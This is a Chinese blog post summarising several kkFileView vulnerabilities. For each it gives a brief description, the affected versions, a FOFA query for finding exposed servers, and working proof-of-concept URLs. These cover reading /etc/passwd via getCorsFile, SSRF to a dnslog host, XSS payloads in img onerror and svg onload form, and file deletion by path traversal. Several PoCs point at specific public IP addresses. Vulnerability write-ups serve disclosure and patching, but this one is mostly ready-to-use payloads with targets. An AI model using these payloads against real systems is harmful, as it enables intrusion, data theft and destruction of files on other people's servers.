kkFileView漏洞总结

刺骨的言语ヽ痛彻心扉 2024-02-05 14:30 109阅读 0赞

0x00 kkFileview存在任意文件读取漏洞

漏洞描述

Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞，该漏洞源于存在通过目录遍历漏洞读取任意文件，可能导致相关主机上的敏感文件泄漏。

漏洞影响

kkFileview <=3.6.0

fofa查询

body=”kkFile ：View”

漏洞证明

http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd

0x01 kkFileView SSR 漏洞

漏 洞描述

kkFileview v4.1.0存在SSRF漏洞，攻击者可以利用此漏洞造成服务器端请求伪造(SSRF)，远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求。

漏洞影响

kkFileview =v4.1.0

漏 洞证明

http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn

0x03 kkFileView XSS漏洞

漏洞描述

kkFileview v4.1.0存两处XSS漏洞，可能导致网站cookies泄露。

漏洞影响

kkFileview =v4.1.0

漏洞证明

http://www.baidu.com/test.txt">

编码base64:

aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg==

url编码：

aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

poc1:

/onlinePreview?url=%3Cimg%20src=x%20οnerrοr=alert(0)%3E

/picturesPreview?urls= aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20οnerrοr=alert(0)%3E

http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+

url编码：

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

poc2:

/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

http://119.91.146.127:8012/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

0x04 kkFileView任意文件上传导致xss和文件包含漏洞

漏洞描述

kkFileview全版本存在文件解析漏洞，攻击者可以利用此漏洞造成存储型 XSS、文件包含或者SSRF，远程攻击者可以通过将任意JavaSript脚本上传到服务器来持久性的利用应用程序发出攻击请求

漏洞影响

kkFileView=4.1.0

漏洞证明

1、上传文件

2、访问漏洞位置http://139.9.101.60:8012/demo/2.html

2.文件包含：

https://file.keking.cn/demo/test1.js

访问： https://file.keking.cn/demo/test14.html

0x05 kkFileView任意文件删除漏洞

漏洞描述

kkFileview v4.0.0存在任意文件删除漏洞，可能导致系统任意文件被删除

漏洞影响

kkFileview= v4.0.0

漏洞证明

/deleteFile?fileName=demo%2F..\xss.pdf
get请求此uri会删除\kkFileView-master\server\src\main\file目录中的xss.pdf(原本只能删除\kkFileView-master\server\src\main\file\demo目录下的文件)

发表评论取消回复

表情：

评论列表（有 0 条评论，109人围观）

还没有评论，来说两句吧...

相关阅读

相关 Shiro框架漏洞总结

一、shiro框架简介： Apache Shiro是一个强大且易用的Java安全框架,能够用于身份验证、授权、加密和会话管理。只要rememberMe的AES加密密钥泄露

悠悠/ 2024年03月25日 22:12/ 0 赞/ 102 阅读

相关 Docker安装kkfileview，kkfileview在docker部署后预览出现预览中的字体样式与源文件不同的解决办法,动态水印 kkfileview漏洞修复

目录 1.Docker安装kkfileview 2.kkfileview在docker部署后预览出现预览中的字体样式与源文件不同的解决办法 2.1. 物理机或虚拟机上运行

女爷i/ 2024年03月16日 21:50/ 0 赞/ 134 阅读

相关 kkFileView漏洞总结

0x00 kkFileview存在任意文件读取漏洞漏洞描述 Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文

刺骨的言语ヽ痛彻心扉/ 2024年02月05日 14:30/ 0 赞/ 110 阅读

相关 Web安全手册(漏洞理解、漏洞利用总结)

0x01 漏洞理解篇(Vulnerability) 前端跨域安全后端逻辑 0x02 漏洞利用篇(Exploit) > SQL injecti

以你之姓@/ 2023年01月16日 03:24/ 0 赞/ 224 阅读

相关 src漏洞类型总结

这三类存在漏洞可能更大越他娘丑的站，越有可能存在洞。 Asp aspx 存在漏洞的可能更大登陆口没得验证码的可能存在 ![在这里插入图片描述][

心已赠人/ 2022年12月31日 03:24/ 0 赞/ 218 阅读

相关文件包含漏洞总结

文章目录前言 php文件包含漏洞 1.本地文件包含 2.远程文件包含 3.本地包含配合apache日志拿shell

一时失言乱红尘/ 2022年11月16日 05:46/ 0 赞/ 281 阅读

相关 kkFileView 预览环境搭建

文章目录 0、概述 1、准备 1.1 kkfileview 1.2 OpenOffice

￡神魔★判官ぃ/ 2022年10月16日 06:02/ 0 赞/ 572 阅读

相关 kkfileview docker安装

官网地址 [https://kkfileview.keking.cn/zh-cn/docs/config.html][https_kkfileview.keking.cn_z

Myth丶恋晨/ 2022年09月10日 13:19/ 0 赞/ 168 阅读

相关 kkfileView使用问题年终答疑篇

前言碎语首先非常感谢社区同仁对kkfileview项目的关注，kkfileview开源一年多以来，收获了两千六百多个赞以及获得码云最有价值项目GVP，这离不开大家的贡献

末蓝、/ 2022年02月12日 23:50/ 0 赞/ 2273 阅读

相关 kkfileview 文档预览安装使用

官网地址：[kkfileview][] 1. 环境要求 Java: 1.8+ `OpenOffice`或`LiberOffice`(Windows下已内置，`Cen

以你之姓@/ 2021年08月19日 12:49/ 0 赞/ 1269 阅读